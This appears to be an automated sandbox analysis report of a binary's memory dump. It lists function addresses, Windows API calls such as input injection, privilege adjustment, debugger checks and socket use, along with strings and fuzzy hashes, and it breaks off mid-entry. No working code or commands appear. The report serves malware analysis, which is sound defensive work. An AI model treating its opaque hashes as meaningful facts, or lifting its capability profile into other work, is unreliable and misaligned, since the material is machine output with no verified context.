Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 10f5b545aac0385c55835d68f96627a8810c109774c6463e03850aaf915e7639
Instruction ID: 8ca658d1ac5b6533b271f2ed024eb0b2f1bcd3f95d267cd2ce7628ed07c458d8
Opcode Fuzzy Hash: 10f5b545aac0385c55835d68f96627a8810c109774c6463e03850aaf915e7639
Instruction Fuzzy Hash: C3D17975528301AFC310EF24C8859ABB7E8FF98304F50496DF5958B2A1EB30ED59CB92

Uniqueness

Uniqueness Score: -1.00%

Function 002922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002922E8

Part of subcall function 0028E4EC: GetWindowRect.USER32(?,?), ref: 0028E504

GetDesktopWindow.USER32 ref: 00292312
GetWindowRect.USER32(00000000), ref: 00292319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00292355
GetCursorPos.USER32(?), ref: 00292381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002923DF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: e630619076ddf0237c2e4a92532b1fa9b20cf2bc5229e0a70a8997f0dbcdc198
Instruction ID: 92d820f0d036a023c4dcc5da5dbe189f259cc3d27733111442d398955f1ec852
Opcode Fuzzy Hash: e630619076ddf0237c2e4a92532b1fa9b20cf2bc5229e0a70a8997f0dbcdc198
Instruction Fuzzy Hash: 67310072504306AFDB20DF14DC09B5BBBADFF88310F100919F988A7181DB34EA18CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00291806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0029304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0029307A
Part of subcall function 0029304E: _wcslen.LIBCMT ref: 0029309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0029185D
WSAGetLastError.WSOCK32 ref: 00291884
bind.WSOCK32(00000000,?,00000010), ref: 002918DB
WSAGetLastError.WSOCK32 ref: 002918E6
closesocket.WSOCK32(00000000), ref: 00291915

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 1188f56b3dce7620b8590e9539d5105563f02a2672fafec472f29d647be5bc9e
Instruction ID: 705ca92d50a9ba48dd23a800e0d489c1e8c94aac3178949849dd17955b047ac8
Opcode Fuzzy Hash: 1188f56b3dce7620b8590e9539d5105563f02a2672fafec472f29d647be5bc9e
Instruction Fuzzy Hash: AE51E375A10210AFEB10AF24D88AF6AB7E5AF44718F148098F9155F3D3CB71ED61CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00218060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 002183FA
VUUU, xrefs: 002183E8
ERCP, xrefs: 0021813C
VUUU, xrefs: 00255DF0
VUUU, xrefs: 0021843C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 4435246b69d78788ac4040c38a2ac2c11d740a8ec452b57b5d4d55799c83ff20
Instruction ID: 9ff60f7a1cb02dc6ed5bf0175705a5daeba9c298f70dd20d45cd25dad75036fa
Opcode Fuzzy Hash: 4435246b69d78788ac4040c38a2ac2c11d740a8ec452b57b5d4d55799c83ff20
Instruction Fuzzy Hash: 80A2BF70E2021ACBDF24CF58C8947EDB3B1BB64311F64819AEC15A7284EB709DE5CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00278298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002782AA

Strings

|, xrefs: 002782DA
(, xrefs: 002782F0
tb-, xrefs: 002784F4

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: lstrlen
String ID: ($tb-$|
API String ID: 1659193697-4172324640
Opcode ID: b325e608aa6245695f12f3721deb41936c917b243e4765a7b34c0b0e4321fa4c
Instruction ID: 9f0eac93659cb08195943896d1b28ce548a3453ab843949e769010ad8c030c90
Opcode Fuzzy Hash: b325e608aa6245695f12f3721deb41936c917b243e4765a7b34c0b0e4321fa4c
Instruction Fuzzy Hash: 34324774A107069FCB28CF59C08596AB7F0FF48710B15C56EE49ADB7A1EB70E951CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0029A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0029A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0029A6BA

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

Process32NextW.KERNEL32(00000000,?), ref: 0029A79C
CloseHandle.KERNEL32(00000000), ref: 0029A7AB

Part of subcall function 0022CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00253303,?), ref: 0022CE8A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 703544ad32549b2d3d6e36a2dfaa81ab0869d40990d37b40198ce6377c772828
Instruction ID: 405147b5c0a672c197a608da1a343dd869c0678c7f280442cea7a78933d08bd7
Opcode Fuzzy Hash: 703544ad32549b2d3d6e36a2dfaa81ab0869d40990d37b40198ce6377c772828
Instruction Fuzzy Hash: AE516B71518300AFD710EF24D886AABBBE8FF99754F00892DF58997252EB30D954CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0027AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0027AAAC
SetKeyboardState.USER32(00000080), ref: 0027AAC8
PostMessageW.USER32 ref: 0027AB36
SendInput.USER32(00000001,?,0000001C), ref: 0027AB88

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4922138acab110877c0c034e6c8dd5ce254f72a1edd92a22304851d8520de795
Instruction ID: 7aaecf49d6ae20f5070db603f6d22c889290e6f01279902722b918fa04f9b398
Opcode Fuzzy Hash: 4922138acab110877c0c034e6c8dd5ce254f72a1edd92a22304851d8520de795
Instruction Fuzzy Hash: 1D311730A60209AFEB25CE64C805BFE77A6ABE5334F14D21AF189521D0D77489A1C752

Uniqueness

Uniqueness Score: -1.00%

Function 0028CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0028CE89
GetLastError.KERNEL32(?,00000000), ref: 0028CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0028CEFE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: dd9e5ebad0191d981bb866c30147b8bd4059a1b6a572059c857ae26c842106c0
Instruction ID: 22312d17f8614a1ff785c1af202eccc6f4b075f601ad8c1bcb2639fac22ba225
Opcode Fuzzy Hash: dd9e5ebad0191d981bb866c30147b8bd4059a1b6a572059c857ae26c842106c0
Instruction Fuzzy Hash: 7221CFB5521306ABEB30EF65D948BA7B7FCEB50314F20442EE646D2191EB74EE148F60

Uniqueness

Uniqueness Score: -1.00%

Function 00242622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0024271A
SetUnhandledExceptionFilter.KERNEL32 ref: 00242724
UnhandledExceptionFilter.KERNEL32(?), ref: 00242731

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 14fd6687245d2bf9667710d862eb3d2b010f8b1676dcdeb588643f7ec9c1ffbd
Instruction ID: b85e87645019ec2925a4ec7fa819e7e8a09cfbb8344e0b8862d071c02a5b5bde
Opcode Fuzzy Hash: 14fd6687245d2bf9667710d862eb3d2b010f8b1676dcdeb588643f7ec9c1ffbd
Instruction Fuzzy Hash: 6531D57491121D9BCB21DF64DD887DCBBB8AF08310F5041EAE80CA7260EB309F958F44

Uniqueness

Uniqueness Score: -1.00%

Function 002851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002851DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00285238
SetErrorMode.KERNEL32(00000000), ref: 002852A1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 4b48a2080170cf7aacc57ba9e99d9ae6f9bb136f13e0d2ab11161ea7005eb58c
Instruction ID: 2c19c4d6e157c73c1b3dcbe50496baed4ac2797b205e95ea86fc943f998df34a
Opcode Fuzzy Hash: 4b48a2080170cf7aacc57ba9e99d9ae6f9bb136f13e0d2ab11161ea7005eb58c
Instruction Fuzzy Hash: 2B314F75A10518DFDB00DF54D888EADBBF4FF49314F148099E8099B3A6DB31E856CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0022FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00230668
Part of subcall function 0022FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00230685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027173A
GetLastError.KERNEL32 ref: 0027174A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: f78f86036d7ab77b5dccab036098916932c5d0b26f02d50ff49b2205e6117749
Instruction ID: 71526911a19d54129504eb780207cb9ec1a28e43f6a485050dbfc168d9fb4f26
Opcode Fuzzy Hash: f78f86036d7ab77b5dccab036098916932c5d0b26f02d50ff49b2205e6117749
Instruction Fuzzy Hash: C61191B2424305BFD7189F54EC86D6BB7BDEF45714B20C56EF05657241EB70BC618A20

Uniqueness

Uniqueness Score: -1.00%

Function 0027D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0027D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0027D645
CloseHandle.KERNEL32(?), ref: 0027D650

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 848456fc179d357fe1ee47325f6eef4642c790e4c7b4f16ab40b5483b9492ca5
Instruction ID: fc6a81c3369f35ab7e1d606b71ed3701916a5c232774a3009e559b5874338cad
Opcode Fuzzy Hash: 848456fc179d357fe1ee47325f6eef4642c790e4c7b4f16ab40b5483b9492ca5
Instruction Fuzzy Hash: C5116175E05228BFDB108F95EC49FAFBFBCEB45B50F108155F908E7290D6704A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00271663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0027168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002716A1
FreeSid.ADVAPI32(?), ref: 002716B1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 33c6148f5416482cb1b6e3f7bd11b0b25be6c06979b23af07ce2b0276050a46c
Instruction ID: b1d22248fbb7fedb4fa22c9e4da0302845a70e491121ee964fdd6716ed2b6a81
Opcode Fuzzy Hash: 33c6148f5416482cb1b6e3f7bd11b0b25be6c06979b23af07ce2b0276050a46c
Instruction Fuzzy Hash: 26F0F47195030DFBDB00DFE49C89AAEBBBCEB08604F608565E501E2181E774AA448A50

Uniqueness

Uniqueness Score: -1.00%

Function 0024C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0024C36C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: f7fcf3df363ebca8749b3c158f705ade2fa0dceef1a9099d8a1b48c3bfef3eb3
Instruction ID: 59e6264159e2e461a715c6cd40b28cfe56131a7935bb9dccf36382bff4493412
Opcode Fuzzy Hash: f7fcf3df363ebca8749b3c158f705ade2fa0dceef1a9099d8a1b48c3bfef3eb3
Instruction Fuzzy Hash: 9B416C7291121AAFCB28DFBDDC48EBB7B78EB84314F2042A9F905C7180E6709D50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0026D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0026D28C

Strings

X64, xrefs: 0026D2A8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 2ac6dc8aa9446ed32d07386747c7d0f67484d8f408d99116242a383f12f73cb9
Instruction ID: 35d64401a73fb36544bacfe4ac377f200263269887baf330721c2f331ead62e6
Opcode Fuzzy Hash: 2ac6dc8aa9446ed32d07386747c7d0f67484d8f408d99116242a383f12f73cb9
Instruction Fuzzy Hash: C3D0C9B482516DEBCB90CB90EC88DD9B37CBB04305F100151F506A2000DB7096488F10

Uniqueness

Uniqueness Score: -1.00%

Function 0023CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: bf09ed8c9746f99418ebe908a1f45a77062fc60f4a97dd1f4bbf4101515f712c
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 53021DB2E102199FDF14CFA9C8806ADFBF5EF48324F25816AD819F7384D731A9518B94

Uniqueness

Uniqueness Score: -1.00%

Function 0021CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#., xrefs: 0021CF7F
Variable is not of type 'Object'., xrefs: 00260C40

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#.
API String ID: 0-2365962978
Opcode ID: 1dac3d9240c5337cf7d54521346dbf6f9e3471c21b142429def325fc4f590477
Instruction ID: c4bc6f724de54e7c7575e6462637e3283b11295eb3808ebc6d48451917c882fa
Opcode Fuzzy Hash: 1dac3d9240c5337cf7d54521346dbf6f9e3471c21b142429def325fc4f590477
Instruction Fuzzy Hash: 2E32AE74960219DBCF14DF90D881AEEB7F5FF24304F20405AE806AB292D771AEA6DF50

Uniqueness

Uniqueness Score: -1.00%

Function 002868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00286918
FindClose.KERNEL32(00000000), ref: 00286961

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: cb92780e3fd2d62d2ec6eb52ce89e3d25a4b76f46219c4e8d5c9fb03277b53c2
Instruction ID: 5938a820a7d811f1ca063cf194a096bf58ea478e7144e416c6e838d317ec93fc
